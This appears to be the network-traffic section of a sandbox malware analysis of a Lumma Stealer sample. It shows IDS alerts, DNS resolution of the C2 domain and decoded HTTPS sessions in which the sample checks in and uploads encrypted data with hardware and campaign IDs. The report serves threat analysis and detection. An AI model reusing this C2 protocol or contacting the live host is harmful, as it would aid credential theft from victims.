2024-12-16T17:15:14.243882+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.8 | 49711 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:14.243882+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49711 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:16.747072+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.8 | 49712 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:16.747072+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49712 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:20.493181+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.8 | 49715 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:20.493181+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49715 | 104.21.50.161 | 443 | TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 17:15:00.530872107 CET | 59301 | 53 | 192.168.2.8 | 1.1.1.1
Dec 16, 2024 17:15:00.678344011 CET | 53 | 59301 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 17:15:00.530872107 CET | 192.168.2.8 | 1.1.1.1 | 0xc584 | Standard query (0) | tacitglibbr.biz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 17:15:00.678344011 CET | 1.1.1.1 | 192.168.2.8 | 0xc584 | No error (0) | tacitglibbr.biz | | 104.21.50.161 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 17:15:00.678344011 CET | 1.1.1.1 | 192.168.2.8 | 0xc584 | No error (0) | tacitglibbr.biz | | 172.67.164.37 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 17:15:16.126475096 CET | 1.1.1.1 | 192.168.2.8 | 0x3703 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 17:15:16.126475096 CET | 1.1.1.1 | 192.168.2.8 | 0x3703 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                                                                                                  • tacitglibbr.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 104.21.50.161 | 443 | 7588 | C:\Users\user\Desktop\wf1Ps82LYF.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:15:02 UTC | 262 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: tacitglibbr.biz
2024-12-16 16:15:02 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-16 16:15:02 UTC | 1015 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 16:15:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=tq484unrdvjpv3q1retpgn7dp0; expires=Fri, 11-Apr-2025 10:01:41 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=50%2FBML0Wb3YjpbV1J61uC4smlVUzk%2BcDqAmbkq%2BsXwjECSWpa2w8FhYCv7NL2p8hJ8ZLK6P5pL3M65eSwX61QC8aimwV2oEx3Iw6MjSGUT%2FKCBXXqBx1nUirFz0G2l9%2Bn6c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f2ff847481d43b9-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1580&rtt_var=618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1733966&cwnd=192&unsent_bytes=0&cid=b6c94e12fd908511&ts=829&x=0"
                                                                                                  2024-12-16 16:15:02 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                  Data Ascii: 2ok
                                                                                                  2024-12-16 16:15:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49707 | 104.21.50.161 | 443 | 7588 | C:\Users\user\Desktop\wf1Ps82LYF.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:15:04 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: tacitglibbr.biz
2024-12-16 16:15:04 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-16 16:15:04 UTC | 1016 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 16:15:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=eugdi597kom9v59bkpf4dkr6nu; expires=Fri, 11-Apr-2025 10:01:43 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTUdEZUhvXYlZqFyMQsS7R3KIqxaVqSmuO8bCBcQ9Qteg%2Bb9sXRTe8IcUDVsSK8oDXNVIJ2wTB9Ti%2B1NKUSOQaktakF%2Bv%2F7XuId5NXTeCRy1%2Fv6ToLUMq6jquo8PBXx9iHw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2ff85479d84bcd-BUF
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=14465&min_rtt=13028&rtt_var=7760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=946&delivery_rate=119047&cwnd=32&unsent_bytes=0&cid=0a9ef75c5e484b67&ts=774&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49708 | 104.21.50.161 | 443 | 7588 | C:\Users\user\Desktop\wf1Ps82LYF.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:15:06 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=EF839D2LLWKORXY5BO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12846
Host: tacitglibbr.biz
2024-12-16 16:15:06 UTC | 12846 | OUT | Data Raw: 2d 2d 45 46 38 33 39 44 32 4c 4c 57 4b 4f 52 58 59 35 42 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 33 32 43 41 38 38 36 46 44 32 30 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 46 38 33 39 44 32 4c 4c 57 4b 4f 52 58 59 35 42 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 46 38 33 39 44 32 4c 4c 57 4b 4f 52 58 59 35 42 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
Data Ascii: --EF839D2LLWKORXY5BOContent-Disposition: form-data; name="hwid"B732CA886FD20D98AC8923850305D13E--EF839D2LLWKORXY5BOContent-Disposition: form-data; name="pid"2--EF839D2LLWKORXY5BOContent-Disposition: form-data; name="lid"PsFKDg--pablo
2024-12-16 16:15:07 UTC | 1024 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 16:15:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=0rbkbk9mvi8j0n0j6booqcnf6r; expires=Fri, 11-Apr-2025 10:01:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BeMky%2FrS0hy%2F5C39xH%2FfiQDiWe1KSRpU%2FdMqhELY6J%2F87jdkjbGBIXraon1vTR1dNJkvBD0G2Zlo7KEt%2Fs3MMepj5tewcuh5Et%2Fqe%2FnmaDFaP7ybyS4I41Is6tE1MiyiRD0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2ff8632ec942d5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1638&rtt_var=1195&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13785&delivery_rate=736815&cwnd=214&unsent_bytes=0&cid=693afc1e4675b397&ts=875&x=0"
2024-12-16 16:15:07 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-16 16:15:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49709 | 104.21.50.161 | 443 | 7588 | C:\Users\user\Desktop\wf1Ps82LYF.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:15:08 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=2MMU31FEZ74B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15039
Host: tacitglibbr.biz
2024-12-16 16:15:08 UTC | 15039 | OUT | Data Raw: 2d 2d 32 4d 4d 55 33 31 46 45 5a 37 34 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 33 32 43 41 38 38 36 46 44 32 30 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 4d 4d 55 33 31 46 45 5a 37 34 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 4d 4d 55 33 31 46 45 5a 37 34 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 32 4d 4d 55 33 31 46 45 5a 37 34 42 0d 0a
Data Ascii: --2MMU31FEZ74BContent-Disposition: form-data; name="hwid"B732CA886FD20D98AC8923850305D13E--2MMU31FEZ74BContent-Disposition: form-data; name="pid"2--2MMU31FEZ74BContent-Disposition: form-data; name="lid"PsFKDg--pablo--2MMU31FEZ74B
2024-12-16 16:15:09 UTC | 1017 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 16:15:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=0na6ku1as81t3a9thee7a0jvmq; expires=Fri, 11-Apr-2025 10:01:48 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Tgvetc5da2q46%2B2e45ry%2Faj1pbg30D4yBeKcLTuobeEuHZoGyu4UJHPhWLi0f%2FhaAN4QXUIl3CAjSa34mtPtf92yq9ZSzsylKnlWNq9OXbhYyrOvdx4iM%2BQBI7cHuRCF2Y%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2ff8713f8b42a0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1617&rtt_var=619&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15972&delivery_rate=1751649&cwnd=222&unsent_bytes=0&cid=ad830d7ecd1ff94a&ts=864&x=0"
2024-12-16 16:15:09 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-16 16:15:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4
Source IP: 192.168.2.8
Source Port: 49710
Destination IP: 104.21.50.161
Destination Port: 443
PID: 7588
Process: C:\Users\user\Desktop\wf1Ps82LYF.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:15:11 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=140DF29UV4GHED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20218
Host: tacitglibbr.biz
2024-12-16 16:15:11 UTC | 15331 | OUT | Data Raw: 2d 2d 31 34 30 44 46 32 39 55 56 34 47 48 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 33 32 43 41 38 38 36 46 44 32 30 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 31 34 30 44 46 32 39 55 56 34 47 48 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 34 30 44 46 32 39 55 56 34 47 48 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 31 34 30 44 46 32 39 55
Data Ascii: --140DF29UV4GHEDContent-Disposition: form-data; name="hwid"B732CA886FD20D98AC8923850305D13E--140DF29UV4GHEDContent-Disposition: form-data; name="pid"3--140DF29UV4GHEDContent-Disposition: form-data; name="lid"PsFKDg--pablo--140DF29U
2024-12-16 16:15:11 UTC | 4887 | OUT | Data Raw: 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
2024-12-16 16:15:12 UTC | 1016 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 16:15:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=q31bbe8gjhp65bgrga7kqjrvrh; expires=Fri, 11-Apr-2025 10:01:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unIjK7FoJ7iHTKFXSSfYi%2B7gtUEepHgb3BUom0SQJgyo2iO2rJiSnvcJzP%2FuWhYcWi37ZUlmtEBSHZ72mL7hG8baOZM7pMIFf0yLtwZQDZYEnY6c8C9RQcsc%2FujUo4Tp4VE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2ff8829c07a252-YYZ
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=14138&min_rtt=14133&rtt_var=5303&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21175&delivery_rate=206608&cwnd=32&unsent_bytes=0&cid=54a3a7bf245953b7&ts=957&x=0"
2024-12-16 16:15:12 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-16 16:15:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5
Source IP: 192.168.2.8
Source Port: 49711
Destination IP: 104.21.50.161
Destination Port: 443
PID: 7588
Process: C:\Users\user\Desktop\wf1Ps82LYF.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:15:14 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=AIDRU3R1C98DTLM9H35
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1249
Host: tacitglibbr.biz
2024-12-16 16:15:14 UTC | 1249 | OUT | Data Raw: 2d 2d 41 49 44 52 55 33 52 31 43 39 38 44 54 4c 4d 39 48 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 33 32 43 41 38 38 36 46 44 32 30 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 49 44 52 55 33 52 31 43 39 38 44 54 4c 4d 39 48 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 49 44 52 55 33 52 31 43 39 38 44 54 4c 4d 39 48 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
Data Ascii: --AIDRU3R1C98DTLM9H35Content-Disposition: form-data; name="hwid"B732CA886FD20D98AC8923850305D13E--AIDRU3R1C98DTLM9H35Content-Disposition: form-data; name="pid"1--AIDRU3R1C98DTLM9H35Content-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-16 16:15:15 UTC | 1014 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 16:15:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=c3gnhhogns501r2pkkbn9ak4i2; expires=Fri, 11-Apr-2025 10:01:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zNfzRRo6Ry4SoHzbWwJmopcVcy8cB7ERXgVze0AiYJzJa%2FsvdOXGvzyatkju16Z0UqVwakFJ%2BKMgWlpxo4A55j3b%2BD1a4uCEk0Kf2gX3AOg4vUiHCmra%2ByH7OETmksOX8ZU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2ff8932edd4276-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2369&min_rtt=2356&rtt_var=910&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2166&delivery_rate=1185546&cwnd=208&unsent_bytes=0&cid=dc06bc7933efdfe7&ts=798&x=0"
2024-12-16 16:15:15 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-16 16:15:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 6
Source IP: 192.168.2.8
Source Port: 49712
Destination IP: 104.21.50.161
Destination Port: 443
PID: 7588
Process: C:\Users\user\Desktop\wf1Ps82LYF.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:15:16 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=0EHZDQXPSN9Y7DE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 587708
Host: tacitglibbr.biz
2024-12-16 16:15:16 UTC | 15331 | OUT | Data Raw: 2d 2d 30 45 48 5a 44 51 58 50 53 4e 39 59 37 44 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 33 32 43 41 38 38 36 46 44 32 30 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 45 48 5a 44 51 58 50 53 4e 39 59 37 44 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 45 48 5a 44 51 58 50 53 4e 39 59 37 44 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 30 45 48 5a 44
Data Ascii: --0EHZDQXPSN9Y7DEContent-Disposition: form-data; name="hwid"B732CA886FD20D98AC8923850305D13E--0EHZDQXPSN9Y7DEContent-Disposition: form-data; name="pid"1--0EHZDQXPSN9Y7DEContent-Disposition: form-data; name="lid"PsFKDg--pablo--0EHZD
2024-12-16 16:15:16 UTC | 15331 | OUT | Data Raw: 23 28 26 37 bd bc 24 dd 8a a4 7a d6 22 82 bd 3b bd d8 f8 f0 a1 22 ca fd bd bb 6f 5f 24 5d ae 3d 41 4b 86 f9 8b 05 ba 94 fe f5 7e 71 96 62 1a a8 fe db 43 a1 61 c8 f9 d8 62 e7 88 eb d3 68 df 44 77 7a f8 ba 76 49 07 6b 31 1e e8 66 8c e6 2e 73 08 38 68 85 80 72 15 a4 44 99 e8 bb 0f 3d f2 d0 6b 29 ed ae 35 c3 67 a2 c8 f6 5d 39 4b 0e 28 f2 3c aa 3b 5e 99 e6 28 da 97 a4 c5 e3 5a 68 32 62 51 1c cf fa 3a 3d 2e ee 91 a3 a4 15 1b 00 fb fa a0 1a 37 cc b2 f1 aa 03 f9 a9 a9 6a 9c 95 0b c3 e1 98 bb dc bb 7a 4e a7 f9 a1 b8 fb e7 cd dd 51 b7 92 5a 25 d1 bd 04 95 a1 48 a4 2a 73 0d 56 dd 2c 00 c9 ff fb c2 03 c6 37 33 31 75 be 9d bc 5d 8c 2c c3 20 28 bb 92 33 34 70 97 d1 54 91 79 10 03 2f d6 96 f6 d4 52 17 bc bd b7 3e 48 f9 c1 02 4a cf af c9 39 96 ba 25 3d ad be d2 74 06 02
Data Ascii: #(&7$z";"o_$]=AK~qbCabhDwzvIk1f.s8hrD=k)5g]9K(<;^(Zh2bQ:=.7jzNQZ%H*sV,731u], (34pTy/R>HJ9%=t
2024-12-16 16:15:16 UTC | 15331 | OUT | Data Raw: e3 d4 34 84 02 47 19 f9 45 18 38 47 ba d9 44 2f 89 fd 6d ac 35 4d b9 21 4b 69 99 c4 fb 42 0a c9 a9 aa d7 83 f8 bc f5 1f 18 eb cf a3 10 ad ec 73 3d 43 d6 d8 9e 5b a8 7f a6 a5 6c 24 3f 4e c3 44 ab 02 f3 75 bc 59 4e 00 c6 0e 9f e3 85 ed ad a2 4a fe 42 fa eb 19 43 59 f7 97 b2 af 97 91 12 ba 2c 37 14 c1 fd 67 f3 48 e9 06 98 05 90 ef a9 56 39 08 49 80 e6 71 ef 97 9c 74 3f 74 1a 1f d7 20 0e e6 15 57 e3 7b 44 08 5f 05 c5 ed e2 79 a6 56 27 49 e9 80 8c 8d 45 f4 79 0d 69 64 01 db d7 ef 13 16 f7 9e ea 66 b5 0f a3 bb ee 88 7b 73 6f d3 b7 5d 21 42 b2 08 78 18 18 7e cc 06 d3 e8 46 81 8d e2 f9 8d 6a 0b 3b 0c 1b f5 95 30 63 3a 27 b4 e2 f5 15 6e 2f 8f 4e 26 eb 8e 04 3e 18 0c 3c 7f f7 cf a5 5d 5b ee 19 ad 6c be 16 38 15 58 bf 3d a9 3c ac 1c b1 c4 c3 ea 32 11 f8 f0 9f f5 2b
Data Ascii: 4GE8GD/m5M!KiBs=C[l$?NDuYNJBCY,7gHV9Iqt?t W{D_yV'IEyidf{so]!Bx~Fj;0c:'n/N&><][l8X=<2+
